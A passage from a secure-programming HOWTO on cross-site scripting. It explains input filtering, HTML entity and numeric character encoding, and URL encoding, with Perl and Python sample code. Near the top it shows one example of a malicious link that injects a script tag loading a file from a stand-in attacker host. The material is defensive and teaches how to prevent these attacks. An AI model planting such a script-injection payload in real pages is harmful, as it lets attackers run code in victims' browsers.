Secure Programming for Linux and Unix HOWTO
Chapter 6. Structure Program Internals and Approach
<A href="http://example.com/comment.cgi?mycomment=<script src='http://bad-site/badfile'></script>">Click here</A>
CERT describes the problem this way in their advisory:
A web site may inadvertently include malicious HTML tags or script in a dynamically generated page based on unvalidated input from untrustworthy sources (CERT Advisory CA-2000-02, Malicious HTML Tags Embedded in Client Web Requests).
Warning: in many cases these techniques can be subverted unless you also control the character encoding of the output; otherwise, an attacker could use an ``unexpected'' character encoding to get around the techniques discussed here. Thankfully, controlling the output character encoding isn't hard; it is discussed in Section 8.5.
The first subsection below discusses how to identify special characters that need to be filtered, encoded, or validated. This is followed by subsections describing how to filter or encode these characters. There is no subsection on validating data; for input validation in general see Chapter 4, and if the input is straight HTML text or a URI, see Section 4.10. Also note that your web application can receive malicious cross-postings, so non-queries should forbid the HTTP GET method (see Section 4.11).
Note that, in general, the ampersand (&) is special in HTML and XML.
# Accept only legal characters:
$summary =~ tr/A-Za-z0-9\ \.\://dc;
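# Remove characters that are commonly special in HTML, URIs, and scripts.
sub remove_special_chars {
    my ($s) = @_;    # lexical copy of the argument
    $s =~ s/[\<\>\"\'\%\;\(\)\&\+]//g;
    return $s;
}
# Sample use:
$data = &remove_special_chars($data);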
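For readers working outside Perl, the two filters above could be sketched in Python roughly as follows. This is only an illustration under stated assumptions: the function name `keep_legal_chars` is hypothetical, and the character sets are copied from the Perl examples rather than being a recommended list for every application.

```python
import re

# Whitelist: letters, digits, space, '.' and ':' (the set kept by the tr/// example).
_ILLEGAL = re.compile(r"[^A-Za-z0-9 .:]")

# Blacklist: the characters stripped by the Perl remove_special_chars.
_SPECIAL = re.compile(r"""[<>"'%;()&+]""")


def keep_legal_chars(text: str) -> str:
    """Delete every character that is not in the whitelist (hypothetical helper)."""
    return _ILLEGAL.sub("", text)


def remove_special_chars(text: str) -> str:
    """Delete the listed special characters and keep everything else."""
    return _SPECIAL.sub("", text)
```

The whitelist form is usually the safer of the two, since a character nobody thought to list is rejected rather than accepted.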
This approach to HTML encoding isn't sufficient in some circumstances. As discussed in Section 8.5, you need to specify the output character encoding (the ``charset''). If some of your data is encoded using a different character encoding than the output character encoding, then you'll need to do something so your output uses a consistent and correct encoding. Also, if you've selected an output encoding other than ISO-8859-1, then you need to make sure that any alternative encodings for special characters (such as "<") can't slip through to the browser. This is a problem with several character encodings, including popular ones like UTF-7 and UTF-8; see Section 4.8 for more information on how to prevent ``alternative'' encodings of characters. One way to deal with incompatible character encodings is to first translate the characters internally to ISO 10646 (which has the same character values as Unicode), and then use either numeric character references or character entity references to represent them:
A numeric character reference looks like "&#D;", where D is a decimal number, or "&#xH;" or "&#XH;", where H is a hexadecimal number. The number given is the ISO 10646 character id (which has the same character values as Unicode). Thus "&#1048;" is the Cyrillic capital letter "I" (И). The hexadecimal form isn't supported in the SGML standard (ISO 8879), so I'd suggest using the decimal form for output. Also, although the SGML specification permits the trailing semicolon to be omitted in some circumstances, in practice many systems don't handle its omission, so always include the trailing semicolon.
A character entity reference does the same thing but uses mnemonic names instead of numbers. For example, "&lt;" represents the < sign. If you're generating HTML, see the HTML specification, which lists all mnemonic names.
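The two kinds of reference described above can be combined in a small encoder. The following Python sketch assumes the input has already been decoded into a Python `str` (so each character's `ord()` value is its ISO 10646 code); the function name `encode_for_html` and the short entity table are illustrative choices, not part of any standard library.

```python
# Entity references for the characters that are special in HTML.
# The apostrophe uses a decimal numeric reference, which avoids relying
# on a mnemonic name for it.
_ENTITIES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
}


def encode_for_html(text: str) -> str:
    """Encode special characters as entities and non-ASCII characters as
    decimal numeric character references, always with a trailing semicolon."""
    out = []
    for ch in text:
        if ch in _ENTITIES:
            out.append(_ENTITIES[ch])
        elif ord(ch) > 127:
            # Decimal form, as suggested in the text above.
            out.append(f"&#{ord(ch)};")
        else:
            out.append(ch)
    return "".join(out)
```

Because the result contains only ASCII characters, it reads the same in any output character encoding that is a superset of ASCII, although the charset should still be declared as discussed in Section 8.5.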
URIs have their own encoding scheme, commonly called ``URL encoding.'' In this system, each character not permitted in a URL is represented by a percent sign followed by its two-digit hexadecimal value. To handle all of ISO 10646 (Unicode), it's recommended to first translate the characters to UTF-8, and then encode each resulting byte this way. See Section 4.10.4 for more about validating URIs.
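As a minimal sketch of this scheme, Python's standard `urllib.parse.quote` converts a string to UTF-8 and then percent-encodes the bytes. The wrapper name `url_encode` is hypothetical, and passing `safe=""` is an assumption made here so that reserved characters such as "/" are escaped as well; whether that is appropriate depends on which part of the URI is being built.

```python
from urllib.parse import quote


def url_encode(text: str) -> str:
    """Percent-encode text for use as a single URI component.

    The text is first translated to UTF-8, then every byte outside the
    unreserved set (letters, digits, '_', '.', '-', '~') becomes %XX.
    """
    return quote(text, safe="", encoding="utf-8")
```

For example, the Cyrillic capital letter "I" (ISO 10646 code 1048) occupies two bytes in UTF-8, so it comes out as two percent-escapes, `%D0%98`.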